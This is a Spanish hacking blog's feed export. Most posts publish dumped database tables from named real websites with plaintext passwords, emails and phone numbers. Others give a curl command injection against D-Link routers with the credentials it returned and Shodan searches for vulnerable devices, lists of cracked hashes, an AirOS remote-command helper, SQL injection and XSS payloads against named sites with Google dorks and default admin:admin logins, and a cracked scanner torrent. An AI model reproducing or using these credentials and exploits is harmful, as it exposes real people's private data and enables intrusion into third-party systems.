tag:blogger.com,1999:blog-15215653022323062222024-03-12T22:40:53.137-07:00AreaLinuxTodo lo que se me pase por la cabeza en relación con LINUXUnknownnoreply@blogger.comBlogger38125tag:blogger.com,1999:blog-1521565302232306222.post-17208203679899741162013-12-24T06:40:00.001-08:002013-12-24T06:40:49.376-08:00<br />
<br />
_ _ _<br />
_ __ _ _| |__ ___ _ __ | (_)_ __ _ ___ __<br />
| '__| | | | '_ \ / _ \ '_ \ | | | '_ \| | | \ \/ /<br />
| | | |_| | |_) | __/ | | | | | | | | | |_| |> <<br />
|_| \__,_|_.__/ \___|_| |_|___|_|_|_| |_|\__,_/_/\_\<br />
|_____|<br />
# Exploit Title:<br />
#<br />
# Google Dork:<br />
#<br />
# Date: 23/12/13<br />
#<br />
# Author: ruben_linux<br />
#<br />
# Site : http://arealinux(dot)blogspot(dot)com(dot)es<br />
# http://www(dot)youtube(dot)com/user/rubenlinux<br />
<br />
<br />
<br />
<br />
<br />
web:<span class="Apple-tab-span" style="white-space: pre;"> </span>www.cth.fr<br />
<br />
Database: centecd2_t8x4<br />
Table: admin<br />
[1 entry]<br />
+----------+-----------+-----------+<br />
| admin_id | admin_mdp | admin_nom |<br />
+----------+-----------+-----------+<br />
| 1 | dnstuff | cthadmin |<br />
+----------+-----------+-----------+<br />
<div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-86681812653012996092013-12-23T10:36:00.001-08:002013-12-23T10:36:15.343-08:00<br />
_ _ _<br />
_ __ _ _| |__ ___ _ __ | (_)_ __ _ ___ __<br />
| '__| | | | '_ \ / _ \ '_ \ | | | '_ \| | | \ \/ /<br />
| | | |_| | |_) | __/ | | | | | | | | | |_| |> <<br />
|_| \__,_|_.__/ \___|_| |_|___|_|_|_| |_|\__,_/_/\_\<br />
|_____|<br />
# Exploit Title:<br />
#<br />
# Google Dork:<br />
#<br />
# Date: 23/12/13<br />
#<br />
# Author: ruben_linux<br />
#<br />
# Site : http://arealinux(dot)blogspot(dot)com(dot)es<br />
# http://www(dot)youtube(dot)com/user/rubenlinux<br />
<br />
<br />
url: www.abus.es<br />
<br />
Database: bdabus<br />
Table: usuario<br />
[3 entries]<br />
+--------+--------+----------+----------+---------------+------------+------------+-------------+-------------+--------------+---------------+----------------+<br />
| usr_id | cursos | usr_pass | usr_tipo | usr_email | usr_ciudad | usr_nombre | contratista | usr_usuario | usr_telefono | usr_provincia | usr_newsletter |<br />
+--------+--------+----------+----------+---------------+------------+------------+-------------+-------------+--------------+---------------+----------------+<br />
| 78 | NULL | DISKUS | NULL | info@abus.es | Urduliz | ABUS | no | ABUS | 946765554 | Bizkaia | NULL |<br />
| 76 | NULL | abus | NULL | NULL | NULL | Clientes | no | clientes | NULL | NULL | NULL |<br />
| 77 | NULL | amaia | NULL | amaya@abus.es | Bilbao | Amaia | no | amaia | 946765554 | Bizkaia | NULL |<br />
+--------+--------+----------+----------+---------------+------------+------------+-------------+-------------+--------------+---------------+----------------+<br />
<div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-43401428924912258002013-12-23T09:54:00.001-08:002013-12-23T09:54:15.667-08:00<br />
_ _ _<br />
_ __ _ _| |__ ___ _ __ | (_)_ __ _ ___ __<br />
| '__| | | | '_ \ / _ \ '_ \ | | | '_ \| | | \ \/ /<br />
| | | |_| | |_) | __/ | | | | | | | | | |_| |> <<br />
|_| \__,_|_.__/ \___|_| |_|___|_|_|_| |_|\__,_/_/\_\<br />
|_____|<br />
# Exploit Title:<br />
#<br />
# Google Dork:<br />
#<br />
# Date: 23/12/13<br />
#<br />
# Author: ruben_linux<br />
#<br />
# Site : http://arealinux(dot)blogspot(dot)com(dot)es<br />
# http://www(dot)youtube(dot)com/user/rubenlinux<br />
<br />
<br />
<br />
url:www.optimil.es<br />
<br />
<br />
Database: optimil_web08<br />
Table: usuarios_extranet<br />
[2 entries]<br />
+---------+<br />
| usuario |<br />
+---------+<br />
| 7palmas |<br />
| 7palmas |<br />
+---------+<br />
<br />
<br />
<br />
Database: optimil_web08<br />
Table: usuarios_extranet<br />
[1 entry]<br />
+----------+<br />
| pwd |<br />
+----------+<br />
| 7palma83 |<br />
+----------+<br />
<div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-72244671789333572362013-02-20T06:34:00.003-08:002013-02-20T06:34:39.288-08:00Isaken Advertising Media Ltd SQL Injection<span style="background-color: white; color: #333000; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; text-align: justify;">DORK: inurl:"dog.php?cat=" "Powered By Isaken Advertising Media Ltd"</span><br />
<span style="background-color: white; color: #333000; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; text-align: justify;"><br /></span>
<a href="http://cxsecurity.com/issue/WLB-2013020142">http://cxsecurity.com/issue/WLB-2013020142</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://cxsecurity.com/images/wlb/cxsecwlb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://cxsecurity.com/images/wlb/cxsecwlb.jpg" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-90027637212680305602013-02-14T13:43:00.000-08:002013-02-14T13:47:10.332-08:00routers D-Link DIR-300 y DIR-600<br />
en los routers D-Link DIR-300 y DIR-600<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">22:34@coyote:~/Escritorio$ sudo curl --data "cmd=cat /var/passwd" http://188.11X.224.XX/command.php</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">"admin" "mortadela" "0"</span><br />
<br />
como encontrar routers vuln????<br />
<br />
http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300<br />
http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaWxMm2PeBK4pb4JzObppHHrRAsHAUYZRNiJfPEaRFsvSbKdabH3WZsfVFH6tpe65y29uaIyO3OLZylKVMCoijysapCokiW4OLMX5XpuwMhwEX_E_ceiQpYC8WyF7VXJJezaJAPnlm94c/s1600/DIR-600_front.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaWxMm2PeBK4pb4JzObppHHrRAsHAUYZRNiJfPEaRFsvSbKdabH3WZsfVFH6tpe65y29uaIyO3OLZylKVMCoijysapCokiW4OLMX5XpuwMhwEX_E_ceiQpYC8WyF7VXJJezaJAPnlm94c/s320/DIR-600_front.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
fuentes:</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://www.h-online.com/security/news/item/Security-alert-for-D-Link-routers-1798804.html"><span style="font-size: x-small;">http://www.h-online.com/security/news/item/Security-alert-for-D-Link-routers-1798804.html</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://threatpost.com/en_us/blogs/researcher-warns-d-link-router-vulnerabilities-020713"><span style="font-size: x-small;">http://threatpost.com/en_us/blogs/researcher-warns-d-link-router-vulnerabilities-020713</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://www.s3cur1ty.de/m1adv2013-003"><span style="font-size: x-small;">http://www.s3cur1ty.de/m1adv2013-003</span></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-26656170103920158272012-12-01T09:01:00.000-08:002012-12-01T09:01:11.853-08:00algunos hash crackeados :-9<br />
2e07f7860badf0d07252c22a31fb03c2:iiris<br />
827ccb0eea8a706c4c34a16891f84e7b:12345<br />
1f36c15d6a3d18d52e8d493bc8187cb9:1985<br />
6e854442cd2a940c9e95941dce4ad598:nobody<br />
cf1cda4e6a61d6d6f3488d83e80e133d:dom1807<br />
8c1f1cd7e4872011e5598a2bb9d8218f:elenasmolkova<br />
9aed3935a05586aeb0b95bda09b8c9ed:deluxesamara10<br />
b092c4b50aedee92de7d76eefbd6e1bc:svetlana10<br />
e177164a897f0b8e447157935302986f:marina10<br />
.<br />
.<br />
.fda592bc3eba16dfcb858dabff8767ff3a12d6c8:93637316<br />
6e1a438cfe5a6c9e2165665f8c2258849ccc43f0:anthony<br />
40fdaeddab9567ad24bb9610ca88930ae1b2d7cc:sonia<br />
12fd5311017d4b8faf7abc6d7fa13d182f519a13:tiago<br />
250e77f12a5ab6972a0895d290c4792f0a326ea8:banana<br />
7c4a8d09ca3762af61e59520943dc26494f8941b:123456<br />
31fb9f38feb65b1accc25e0538d508d715d951bb:1901<br />
.<br />
.<br />
.<br />
<br />
$P$BSoEJlvUeXQyg4qcaxUiWGaxOM5z8n1:111111<br />
$P$BpQJpfGl8dEm.neUHzYsuXw06dr56q0:mother<br />
$P$B5D2wIt9Q61eJFsQtNEb9CwkAFrYsQ.:122333<br />
$P$BSRHKuSiB5JFsgl7EYG/YMrASJZgi81:black<br />
$P$B00stfoYggMMzD0kN/UJkoSUXcLF.g0:iloveyou<br />
$P$B8SQq1HJD9TNjm/loMQYJeAj7AE6Sj0:diamond<br />
$P$B91RnAmZHNO/lO4ya2M9xfuJsJpp2J/:iloveyou<br />
$P$BgDyA6ygSPn7/mDPm5SSg3qqcTolIV/:cocacola<br />
<br />
<a href="http://pastebin.com/EB9X948B">http://pastebin.com/EB9X948B</a><br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-47862021687625859682012-10-22T09:41:00.002-07:002012-10-22T09:41:31.887-07:00video curso de programacion en python<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijqodWmIX9L_b5rlD7HaMQzpanhchIKj0a3NxKAGJbctGx-JEaiQtbmVfg3bzATgKyFUPJlKaGStPEccarrmL_8bCD2xgpH05DFWyCTF4HGXv0pW04iwSk-o_Rqb59qFzJ-scuH6IoWTlk/s320/python.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijqodWmIX9L_b5rlD7HaMQzpanhchIKj0a3NxKAGJbctGx-JEaiQtbmVfg3bzATgKyFUPJlKaGStPEccarrmL_8bCD2xgpH05DFWyCTF4HGXv0pW04iwSk-o_Rqb59qFzJ-scuH6IoWTlk/s320/python.png" /></a></div>
<span style="background-color: white; color: #555555; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; text-align: center;"></span><br />
<ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li style="text-align: left;"><br class="Apple-interchange-newline" />Que es Python?</li>
<li style="text-align: left;">Historia de Python</li>
<li style="text-align: left;">Fundamentos de Programación</li>
<li style="text-align: left;">Fundamentos de Lógica</li>
<li style="text-align: left;">Estructura de Datos y Algoritmos</li>
<li style="text-align: left;">Metodología para Solucionar un Problema</li>
<li style="text-align: left;">Algoritmos</li>
<li style="text-align: left;">Variables, Constantes y Operadores</li>
<li style="text-align: left;">Variables, Constantes y Operadores 2</li>
<li style="text-align: left;">Estructuras Básicas 1</li>
<li style="text-align: left;">Estructuras Básicas 2</li>
<li style="text-align: left;">Técnicas para Representar Algoritmos 1</li>
<li style="text-align: left;">Técnicas para Representar Algoritmos 2</li>
<li style="text-align: left;">Técnicas para Representar Algoritmos 3</li>
</ul>
<span style="background-color: white; color: #555555; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; text-align: center;"><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="" name="more"></a></li>
<li style="text-align: left;">Técnicas para Representar Algoritmos 4</li>
<li style="text-align: left;">La Tecnología 1</li>
<li style="text-align: left;">La Tecnología 2</li>
<li style="text-align: left;">La Tecnología 3</li>
<li style="text-align: left;">La Tecnología 4</li>
<li style="text-align: left;">Metodología, Tecnología y Técnicas para Solucionar un Problema</li>
<li style="text-align: left;">Metodología, Tecnología y Técnicas para Solucionar un Problema 1A</li>
<li style="text-align: left;">Metodología, Tecnología y Técnicas para Solucionar un Problema 1B</li>
<li style="text-align: left;">Metodología, Tecnología y Técnicas para Solucionar un Problema 2A</li>
<li style="text-align: left;">Metodología, Tecnología y Técnicas para Solucionar un Problema 2B</li>
<li style="text-align: left;">Metodología, Tecnología y Técnicas para Solucionar un Problema 3A</li>
<li style="text-align: left;">Metodología, Tecnología y Técnicas para Solucionar un Problema 3B</li>
<li style="text-align: left;">Decisiones 1</li>
<li style="text-align: left;">Decisiones 2</li>
<li style="text-align: left;">Decisiones 3</li>
<li style="text-align: left;">Ciclos 1</li>
<li style="text-align: left;">Ciclos 2</li>
<li style="text-align: left;">Ciclos 3</li>
<li style="text-align: left;">Ciclos 4</li>
<li style="text-align: left;">Ciclos 5</li>
<li style="text-align: left;">Ciclos 6</li>
<li style="text-align: left;">Ciclos 7</li>
<li style="text-align: left;">Ciclos 8</li>
<li style="text-align: left;">Ciclos 9</li>
<li style="text-align: left;">Ciclos 10</li>
<li style="text-align: left;">Ciclos 11</li>
<li style="text-align: left;">Ciclos 12</li>
<li style="text-align: left;">Ciclos 13</li>
<li style="text-align: left;">Ciclos 14</li>
<li style="text-align: left;">Arreglos 1</li>
<li style="text-align: left;">Arreglos 2</li>
<li style="text-align: left;">Arreglos 3</li>
<li style="text-align: left;">Arreglos 4</li>
<li style="text-align: left;">Arreglos 5</li>
<li style="text-align: left;">Arreglos 6</li>
<li style="text-align: left;">Arreglos 7</li>
<li style="text-align: left;">Arreglos 8</li>
<li style="text-align: left;">Arreglos 9</li>
<li style="text-align: left;">Arreglos 10</li>
<li style="text-align: left;">Arreglos 11</li>
<li style="text-align: left;">Matrices y Funciones</li>
</ul>
</span><span style="background-color: white; color: #555555; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;"><br /><b style="background-color: black;"><span style="color: white;">DOCUMENTOS</span></b><br /><br /><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li>Programando con Stackless Python</li>
<li>Python y PyQT</li>
<li>Kspread y Python nos ofrecen una forma simple de realizar facturas automáticas</li>
<li>Exploración del Lenguaje Script Boo</li>
<li>La revolución se acerca al mundo de Python</li>
<li>No solo las Tortugas Pintan</li>
<li>Inseguridades</li>
<li>Expansión de Gedit, el pequeño gran editor</li>
<li>Gráficos que Ayudan a Pensar</li>
<li>Crea un Albun de Imagenes</li>
<li>Generación de Informes Profesionales desde Python</li>
<li>Representacion Grafica 2D</li>
<li>La nueva Tecnologia Web</li>
<li>La libreria Curses en Python</li>
<li>Visualizacion 3D con VTK</li>
<li>WepPy un framework muy ligero</li>
<li>Crear aplicaciones en red con Twisted</li>
<li>Python: Potencia y sencillez multiplataforma</li>
<li>Wiki Wiki Python</li>
<li>Extendiendo Xchat</li>
<li>PyUno: Explora todo el potencial Open Office</li>
<li>Imagenes Satelite en Python</li>
<li>Enlazando Python con la realidad</li>
<li>Pensando en Python (y IV): XML, Java e IA</li>
<li>El Poder de Gnuplot y las expresiones regulares</li>
<li>Aprovecha y usa cualquier librerías de Java</li>
<li>La R.A.E. y Python raudas al rescate</li>
<li>Mayordomo Python</li>
<li>Cuando los Mundos Chocan</li>
<li>Sudokus</li>
<li>Meta-Python</li>
<li>Pensando en Python (III): 3 en raya en la web</li>
<li>Mundos 3D con Python y Panda 3D</li>
<li>IronPython</li>
<li>Nunca el 3D fue tan sencillo como con Python y Blender</li>
<li>Baile Perfecto</li>
<li>Plugings 2.0</li>
<li>Python y la Web</li>
<li>Filtros Bayesianos en Python</li>
<li>Inteligencia Artificial y Python</li>
<li>Trucos Python</li>
<li>DBUS y la Serpiente</li>
<li>Comparativa de IDES para Python</li>
<li>Introducción de Python en Linux</li>
<li>Máxima Seguridad</li>
<li>Librerías wxWindows</li>
<li>Zona Plone</li>
<li>La Serpiente Muda su Piel</li>
<li>Regularidades</li>
</ul>
<br />Recuerdo, que también incluye software libre y códigos ya hechos de ejemplos.<br /><br />Descargar: <a class="bbc_link" href="http://vmware.vts2006.com/ISOS/Aprender%20Python.iso" style="color: #f70413; outline: none; text-decoration: none;" target="_blank">http://vmware.vts2006.com/ISOS/Aprender%20Python.iso</a></span><br />
<br />
fuente: <a href="http://www.queseguridad.com/2012/09/video-curso-de-programacion-en-python.html">http://www.queseguridad.com/2012/09/video-curso-de-programacion-en-python.html</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-75557158340515336742012-10-13T11:36:00.003-07:002012-10-13T11:36:21.952-07:00Web Application Penetration Testing con Google Chrome<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.veryicon.com/icon/png/System/Hologram/Google%20chrome.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.veryicon.com/icon/png/System/Hologram/Google%20chrome.png" /></a></div>
<span style="background-color: white; font-family: Calibri; font-size: 15px; line-height: 21px; text-align: justify;">Pequeña lista de extensiones interesantes y útiles que pueden ayudar a muchos de nosotros cuando estemos haciendo una prueba de penetración.</span><br />
<span style="background-color: #010101; color: #b9b9b9; font-family: Calibri; font-size: 15px; line-height: 21px; text-align: justify;"><br /></span>
<div style="text-align: justify;">
<span style="color: #b9b9b9; font-family: Calibri; font-size: medium;"><span style="line-height: 21px;"><b><u>xss rays</u></b></span></span></div>
<div style="text-align: justify;">
<span style="color: #b9b9b9; font-family: Calibri; font-size: medium;"><span style="line-height: 21px;"><b><u>google hack data base</u></b></span></span></div>
<div style="text-align: justify;">
<span style="color: #b9b9b9; font-family: Calibri; font-size: medium;"><span style="line-height: 21px;"><b><u>hpp finder</u></b></span></span></div>
<div style="text-align: justify;">
<span style="color: #b9b9b9; font-family: Calibri; font-size: medium;"><span style="line-height: 21px;"><b><u>form fuzzer</u></b></span></span></div>
<div style="text-align: justify;">
<span style="color: #b9b9b9; font-family: Calibri; font-size: medium;"><span style="line-height: 21px;"><b><u>...</u></b></span></span></div>
<div style="text-align: justify;">
<span style="color: #b9b9b9; font-family: Calibri; font-size: medium;"><span style="line-height: 21px;"><b><u><br /></u></b></span></span></div>
<div style="text-align: justify;">
<span style="color: #b9b9b9; font-family: Calibri; font-size: medium;"><span style="line-height: 21px;"><b><u>fuente: </u></b></span></span><a href="http://www.blackploit.com/2012/10/web-application-penetration-testing-con.html#more">http://www.blackploit.com/2012/10/web-application-penetration-testing-con.html#more</a></div>
<div style="text-align: justify;">
<a href="http://calebbucker.blogspot.com.es/2012/10/web-application-penetration-testing-con.html">http://calebbucker.blogspot.com.es/2012/10/web-application-penetration-testing-con.html</a></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-84637992407922631422012-10-12T05:34:00.001-07:002012-10-12T05:34:56.123-07:00Explotación, postexplotación y potencial del 0day en AirOSRecordais esta noticia:<br />
<a href="http://arealinux.blogspot.com.es/2011/12/0day-en-airos-acceso-como-root.html">http://arealinux.blogspot.com.es/2011/12/0day-en-airos-acceso-como-root.html</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXadKiY-WlACqTnRDMUD4BiE37JDFUdS63q7Lk_NS5SvrTaoec8IUCnQBsSNdzAVc8Y4WsZz1xSCAeM1sNAiCajzoVscwaY8ghb1qHsYLsHMQDh7K8iD4RzDPWa9uJI9mHT0gS4iHXy88/s1600/logoowned.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXadKiY-WlACqTnRDMUD4BiE37JDFUdS63q7Lk_NS5SvrTaoec8IUCnQBsSNdzAVc8Y4WsZz1xSCAeM1sNAiCajzoVscwaY8ghb1qHsYLsHMQDh7K8iD4RzDPWa9uJI9mHT0gS4iHXy88/s320/logoowned.png" width="320" /></a></div>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
....</blockquote>
<blockquote class="tr_bq">
Tenemos un pequeño directorio con un puñado de binarios ya crosscompilados y listos para AirOS disponible en:</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
http://5.175.223.63/bin/</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
Y empaquetado en .tar:</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
http://5.175.223.63/bin.tar</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
Incluso podríamos incluir algunos más como ngircd (Un pequeño servidor IRC), o lo que se nos ocurra.</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
A continuación, vamos a pasar a automatizar estas tareas. Obviamente no puedo publicar más que un par de lineas para deja la imaginación flotar con bash y curl:</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<i style="background-color: blue;">runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; } 2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!' -A 99999 | tail -n +5 | tac | tail -n +7 | tac; }</i></blockquote>
<blockquote class="tr_bq">
....</blockquote>
</blockquote>
fuente: <a href="http://www.hackplayers.com/2012/10/explotacion-postexplotacion-0day-en-AirOS.html#more">http://www.hackplayers.com/2012/10/explotacion-postexplotacion-0day-en-AirOS.html#more</a><br />
vuln: <a href="http://www.shodanhq.com/search?q=airos">http://www.shodanhq.com/search?q=airos</a><br />
1º noticia: <a href="http://seclists.org/fulldisclosure/2011/Dec/419%C2%A0" target="_blank">http://seclists.org/fulldisclosure/2011/Dec/419 </a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-60628033927980915032012-10-08T12:40:00.001-07:002012-10-08T12:40:00.633-07:00<a href="http://exiv.me/_test_pluton/_php_my_ads-exiv_iis/index.php?&db=exiv_web&phpMyAdmin=6dnIjsqXEuYlCP5Z4mjJ0yKzha4">http://exiv.me/_test_pluton/_php_my_ads-exiv_iis/index.php?&db=exiv_web&phpMyAdmin=6dnIjsqXEuYlCP5Z4mjJ0yKzha4</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-37828697803600412392012-09-04T15:40:00.000-07:002012-09-04T15:40:10.501-07:00Reupload Acunetix 8 0 2012 02 09 Crack by x9a3k Torrent DownloadReupload Acunetix 8 0 2012 02 09 Crack by x9a3k Torrent Download<br />
<br />
Torrent Files list:<br />
-----------------------<br />
2012_02_09_01_webvulnscan8.exe 14 MB<br />
Activation.exe 2 MB<br />
Read Me.txt 0 MB<br />
Torrent downloaded from Demonoid.txt 0 MB<br />
wvs.exe 11 MB<br />
<br />
Torrent download links:<br />
-----------------------<br />
<a href="http://thepiratebay.org/torrent/7050908/Reupload_-_Acunetix_8.0_2012.02.09___Crack_by_x9a3k" target="_blank">http://thepiratebay.org/torrent/7050...Crack_by_x9a3k</a><br />
<a class="bbc_link" href="http://bitsnoop.com/reupload-acunetix-8-0-2012-02-09-q34815914.html" target="_blank">http://bitsnoop.com/reupload-acunetix-8-0-2012-02-09-q34815914.html</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-87317668560874705232012-09-03T05:03:00.001-07:002012-09-05T07:09:59.503-07:00SQL injectio news-detail.php?id<pre><code> _ _ _
_ __ _ _| |__ ___ _ __ | (_)_ __ _ ___ __
| '__| | | | '_ \ / _ \ '_ \ | | | '_ \| | | \ \/ /
| | | |_| | |_) | __/ | | | | | | | | | |_| |> <
|_| \__,_|_.__/ \___|_| |_|___|_|_|_| |_|\__,_/_/\_\
|_____|
# Exploit Title: SQL Injection
#
# Google Dork: "Website Created and Hosted By Triad"
#
# Date: 5/9/12
#
# Author: ruben_linux
#
# Site : http://arealinux(dot)blogspot(dot)com(dot)es
# http://www(dot)youtube(dot)com/user/rubenlinux
==================================
Files affected : news-detail.php
parameter: id
==================
PoC-Exploit
==================
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5' AND 6992=6992 AND 'kaiM'='kaiM
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=5' AND (SELECT 8596 FROM(SELECT
COUNT(*),CONCAT(0x3a6974713a,(SELECT (CASE WHEN (8596=8596) THEN 1 ELSE 0
END)),0x3a6a6c763a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PzcT'='PzcT
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: id=5' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL,
CONCAT(0x3a6974713a,0x4c6b50577255634a4c52,0x3a6a6c763a), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=5' AND SLEEP(5) AND 'wZaG'='wZaG
[+] http://www.******.com/news-detail.php?id=5[SQLi]</code></pre>
<pre><code> </code></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://packetstatic.com/img1338146966/ps_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://packetstatic.com/img1338146966/ps_logo.png" /></a></div>
http://packetstormsecurity.org/files/116228/Website-Created-By-Triad-SQL-Injection.html<pre><code> </code></pre>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-3684365285662084862012-09-02T15:45:00.000-07:002012-09-02T15:45:05.477-07:00tambien aqui la publicaron :-)<a href="http://www.1337day.com/exploits/19309">http://www.1337day.com/exploits/19309</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.1337day.com/banner/banner0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="72" src="http://www.1337day.com/banner/banner0.jpg" width="320" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-20894175221545775732012-09-01T07:24:00.000-07:002012-09-01T09:10:48.835-07:00xss y panel admin _ _ _ <br />
_ __ _ _| |__ ___ _ __ | (_)_ __ _ ___ __<br />
| '__| | | | '_ \ / _ \ '_ \ | | | '_ \| | | \ \/ /<br />
| | | |_| | |_) | __/ | | | | | | | | | |_| |> < <br />
|_| \__,_|_.__/ \___|_| |_|___|_|_|_| |_|\__,_/_/\_\<br />
|_____| <br />
<br />
# Type: Xss & default admin panel<br />
#<br />
# Google Dork: "powered by rcart"<br />
#<br />
# Date: 1/9/12<br />
#<br />
# Author: ruben_linux<br />
#<br />
# Site : http://arealinux(dot)blogspot(dot)com(dot)es<br />
# http://www(dot)youtube(dot)com/user/rubenlinux<br />
==================================<br />
<br />
[+] http://www.emallhub.com/<br />
[+] http://www.jaya4tech.com<br />
<br />
http://www.jaya4tech.com/ajax/ajaxseachauto?format=json&q=[HERE XSS]&limit=10&timestamp=1346508322457<br />
http://www.emallhub.com/ajax/ajaxseachauto?format=json&q=[HERE XSS]&limit=10&timestamp=1346508394788<br />
<br />
<<script>alert(132);<br />
<br />
http://www.jaya4tech.com/admin~~~|<br />
|---->admin:admin<br />
http://www.emallhub.com/admin~~~~|<br />
<br />
Also: http://packetstormsecurity.org/files/115906/Zend-Framework-Information-Disclosure.html<br />
<br />
[+] http://www.lumbiniimports.com/application/configs/application.ini<br />
[+] http://www.emallhub.com/application/configs/application.ini<br />
[+] http://www.jaya4tech.com/application/configs/application.ini<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://packetstatic.com/img1338146966/ps_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://packetstatic.com/img1338146966/ps_logo.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://packetstormsecurity.org/files/116158/RCart-Cross-Site-Scripting-Admin-Panel.html">http://packetstormsecurity.org/files/116158/RCart-Cross-Site-Scripting-Admin-Panel.html</a></div>
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-1882332340461239722012-08-27T10:45:00.005-07:002012-08-27T10:53:41.002-07:00Xss no persistenteXss <b>no</b> persistente<br />
el parametro "uri" es vulnarable a xss en el archivo index.php <br />
<br />
+[DEMO] <a href="http://www.mht.ch/index.php?uri=%3Ca%20href=%22http://arealinux.blogspot.com/%22%3E%20%3Cimg%20src=%22http://4.bp.blogspot.com/-V6VLv7EUqfU/TieCJxQzgSI/AAAAAAAAAEM/UcIOZz7fqxY/s1600/chicho_terrmoto.jpeg%22%3E%3C/a%3E" target="_blank">http://www.mht.ch/index.php?uri=%3Ca%20href=%22http://arealinux.blogspot.com/%22%3E%20%3Cimg%20src=%22http://4.bp.blogspot.com/-V6VLv7EUqfU/TieCJxQzgSI/AAAAAAAAAEM/UcIOZz7fqxY/s1600/chicho_terrmoto.jpeg%22%3E%3C/a%3E</a><br />
<br />
